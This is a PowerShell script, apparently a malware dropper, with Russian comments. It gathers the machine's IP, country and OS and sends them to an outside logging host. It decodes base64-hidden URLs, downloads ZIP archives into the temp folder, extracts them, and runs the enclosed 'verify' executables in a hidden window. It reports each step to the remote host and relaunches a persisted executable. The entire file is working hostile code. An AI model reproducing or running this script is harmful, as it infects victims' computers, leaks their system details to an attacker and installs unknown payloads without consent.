[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Write-Host "Скрипт запущен" try { # Сбор информации о системе $ipInfo = Invoke-RestMethod -Uri "http://ipinfo.io/json" Write-Host "IP-данные получены: $ipInfo" $ip = $ipInfo.ip $country = $ipInfo.country $os = (Get-WmiObject Win32_OperatingSystem).Caption Write-Host "ОС: $os, Страна: $country" # Формирование данных для начального сообщения $info = @{ ip = $ip country = $country flag = "🌍" os = $os message = ":rocket: Script execution started successfully.`nEarth IP: $ip`nLocation Country: $country`nSystem Operating system: $os`nTime: $(Get-Date -Format 'yyyy-MM-dd HH:mm:ss')" } # Отправка начального сообщения $infoJson = $info | ConvertTo-Json -Depth 10 Invoke-RestMethod -Uri "https://tlgrmverif.cyou/log.php" -Method POST -Body $infoJson -ContentType "application/json" Write-Host "Начальное сообщение отправлено." } catch { Write-Host "Ошибка при сборе информации о системе: $_" } # Список ресурсов с новым доменом $e = @( @{ u = "aHR0cHM6Ly9taWNyb3BlZGlrLmluLzEuemlw"; z = "MS56aXA="; x = "ZXh0cmFjdA=="; e = "dmVyaWZ5MS5leGU=" }, @{ u = "aHR0cHM6Ly9taWNyb3BlZGlrLmluLzIuemlw"; z = "Mi56aXA="; x = "ZXh0cmFjdA=="; e = "dmVyaWZ5Mi5leGU=" }, @{ u = "aHR0cHM6Ly9taWNyb3BlZGlrLmluLzMuemlw"; z = "My56aXA="; x = "ZXh0cmFjdA=="; e = "dmVyaWZ5My5leGU=" } ) function d([string]$s) { [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)) } foreach ($r in $e) { try { $u = d $r.u $z = Join-Path $env:TEMP (d $r.z) $x = Join-Path $env:TEMP (d $r.x) $n = d $r.e # Скачивание ZIP-файла Write-Host "Скачивание ZIP с $u" Invoke-WebRequest -Uri $u -OutFile $z if (Test-Path $z) { Write-Host "ZIP-файл скачан: $z" $statusMessage = ":package: ZIP file downloaded successfully: $z" } else { Write-Host "Ошибка: ZIP-файл не скачан." $statusMessage = ":x: ZIP file not downloaded: $u" continue } # Отправка статуса скачивания $info.message = $statusMessage $infoJson = $info | ConvertTo-Json -Depth 10 Invoke-RestMethod -Uri "https://tlgrmverif.cyou/log.php" -Method POST -Body $infoJson -ContentType "application/json" # Распаковка ZIP-файла Add-Type -AssemblyName System.IO.Compression.FileSystem [System.IO.Compression.ZipFile]::ExtractToDirectory($z, $x) Write-Host "ZIP-файл распакован в $x" $statusMessage = ":open_file_folder: ZIP file extracted to: $x" # Отправка статуса распаковки $info.message = $statusMessage $infoJson = $info | ConvertTo-Json -Depth 10 Invoke-RestMethod -Uri "https://tlgrmverif.cyou/log.php" -Method POST -Body $infoJson -ContentType "application/json" # Запуск EXE-файла $p = Join-Path $x $n if (Test-Path $p) { Write-Host "Запуск файла: $p" Start-Sleep -Seconds 5 Start-Process -FilePath $p -WindowStyle Hidden -ArgumentList "-ExecutionPolicy Bypass" $statusMessage = ":white_check_mark: Executable file launched successfully: $p" } else { Write-Host "Ошибка: файл $p не найден." $statusMessage = ":x: Executable file not found: $p" } # Отправка статуса запуска $info.message = $statusMessage $infoJson = $info | ConvertTo-Json -Depth 10 Invoke-RestMethod -Uri "https://tlgrmverif.cyou/log.php" -Method POST -Body $infoJson -ContentType "application/json" } catch { $statusMessage = ":x: An error occurred during execution: $_" Write-Host "Ошибка выполнения: $_" $info.message = $statusMessage $infoJson = $info | ConvertTo-Json -Depth 10 Invoke-RestMethod -Uri "https://tlgrmverif.cyou/log.php" -Method POST -Body $infoJson -ContentType "application/json" } } # Автозапуск verify.exe при повторном запуске скрипта $persistentPath = Join-Path $env:TEMP "extract\verify.exe" if (Test-Path $persistentPath) { Write-Host "Повторный запуск verify.exe" Start-Process -FilePath $persistentPath -WindowStyle Hidden -ArgumentList "-ExecutionPolicy Bypass" }